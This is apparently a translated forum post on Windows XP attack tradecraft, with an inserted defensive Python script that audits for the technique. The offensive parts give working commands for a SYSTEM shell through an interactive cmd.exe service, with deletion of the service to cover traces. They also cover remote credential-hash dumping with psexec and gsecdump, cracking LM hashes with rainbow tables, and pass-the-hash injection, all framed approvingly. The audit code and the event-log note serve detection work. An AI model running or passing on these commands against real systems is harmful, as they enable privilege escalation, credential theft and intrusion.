To get a DOS prompt as NT SYSTEM (local administrator rights are needed to create the service):

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

The 1053 error is expected: cmd.exe never reports itself to the Service Control Manager, so the SCM gives up on it, but by then the new command window has already been spawned on the console. Remove the service afterwards so nothing is left behind:

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

This relies on interactive services (type= interact) sharing the console desktop with the logged-on user, which holds on Windows XP and Server 2003. Vista and later isolate services in session 0, so the window never reaches the user's desktop there.

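For the defender's side of the procedure above, here is an added example (not part of the original post or of the TrueSec article it quotes): a small audit that flags services carrying the SERVICE_INTERACTIVE_PROCESS bit (0x100, which `type= interact` sets; `type= own` is 0x10) whose binary is a command interpreter such as cmd.exe. The input mimics `sc qc` output; the three service blocks are constructed for this example, and the severity labels and record fields are my own normalization, not a Windows format.

```python
"""Audit service definitions for the 'interactive service running a shell'
pattern (sc create ... binpath= "cmd.exe /K start" type= own type= interact).

Input is text in the shape of `sc qc <name>` output; the SAMPLE below is
constructed for this example, not captured from a real host.
"""
from __future__ import annotations

from dataclasses import dataclass

# Service type bits (SERVICE_* constants from winnt.h).
SERVICE_WIN32_OWN_PROCESS = 0x10
SERVICE_WIN32_SHARE_PROCESS = 0x20
SERVICE_INTERACTIVE_PROCESS = 0x100   # the bit that `type= interact` sets

# Interpreters that have no business being a service's binary.
SHELL_IMAGES = {"cmd.exe", "command.com", "powershell.exe", "cscript.exe", "wscript.exe"}


@dataclass
class ServiceRecord:
    name: str
    image_path: str      # BINARY_PATH_NAME, may carry arguments
    service_type: int    # TYPE, parsed from its hex field
    account: str         # SERVICE_START_NAME


def parse_sc_qc(text: str) -> list[ServiceRecord]:
    """Parse one or more concatenated `sc qc`-style blocks."""
    blocks: list[dict] = []
    cur: dict | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("SERVICE_NAME:"):
            cur = {"name": line.split(":", 1)[1].strip()}
            blocks.append(cur)
        elif cur is not None and ":" in line:
            key, val = (p.strip() for p in line.split(":", 1))
            if key == "TYPE":
                cur["type"] = int(val.split()[0], 16)   # sc prints TYPE in hex
            elif key == "BINARY_PATH_NAME":
                cur["image"] = val
            elif key == "SERVICE_START_NAME":
                cur["account"] = val
    return [ServiceRecord(b["name"], b.get("image", ""), b.get("type", 0), b.get("account", ""))
            for b in blocks]


def image_basename(image_path: str) -> str:
    """Lower-cased file name of the executable in a (possibly quoted) command line."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        exe = s[1:end] if end != -1 else s[1:]
    else:
        exe = s.split(maxsplit=1)[0] if s else ""
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(rec: ServiceRecord) -> tuple[str, list[str]]:
    """Return (severity, reasons). Both indicators together is the trick on this page."""
    reasons = []
    if rec.service_type & SERVICE_INTERACTIVE_PROCESS:
        reasons.append("interactive service (TYPE has 0x100 set)")
    if image_basename(rec.image_path) in SHELL_IMAGES:
        reasons.append("binary is a command interpreter")
    if len(reasons) == 2:
        return "HIGH", reasons
    if reasons:
        return "LOW", reasons
    return "NONE", reasons


def audit(text: str) -> dict[str, str]:
    """Map service name -> severity for every record in the text."""
    return {rec.name: classify(rec)[0] for rec in parse_sc_qc(text)}


# Constructed sample: the service from this page plus two ordinary ones.
SAMPLE = """
SERVICE_NAME: shellcmdline
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\\WINDOWS\\system32\\cmd.exe /K start
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: Spooler
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\\WINDOWS\\system32\\spoolsv.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: AcmeAgent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\\Program Files\\Acme Agent\\agent.exe" -service
        SERVICE_START_NAME : NT AUTHORITY\\LocalService
"""

if __name__ == "__main__":
    for rec in parse_sc_qc(SAMPLE):
        sev, why = classify(rec)
        print(f"{sev:<4} {rec.name:<14} {rec.image_path}  [{'; '.join(why)}]")
```

Because the attacker deletes the service right after the window appears, a live `sc qc` sweep only catches it while the service exists; the durable record is the System event log entry 7045 ("A service was installed in the system"), whose Service File Name field can be fed through the same `image_basename` check.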
C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from the active logon sessions of a remote system (-c copies gsecdump.exe to the target, -f overwrites any copy already there, -s runs it as SYSTEM; the redirect writes the output to a file on your own machine).
These are a lot better than getting a cachedump of the Cached Credentials: cached domain logons are stored salted with the username, so they cannot be attacked with precomputed tables, whereas the logon-session dump includes the unsalted LM hashes, which can be easily broken with Rainbow Tables. The LM hash is only there when the password is 14 characters or fewer and LM hash storage has not been disabled (NoLMHash); otherwise you are left with the NT hash.

A tip: you can use iam from the pshtools toolkit to load the HASH information that gsecdump just grabbed into the local lsass process, to carry out a hash-injection attack. The foreigners really are good; the admins are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash: there is actually no need to crack the password at all, it is just a matter of using the tool. As the original article puts it nicely, whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from 2007/03/16. Frustrating, what a gap.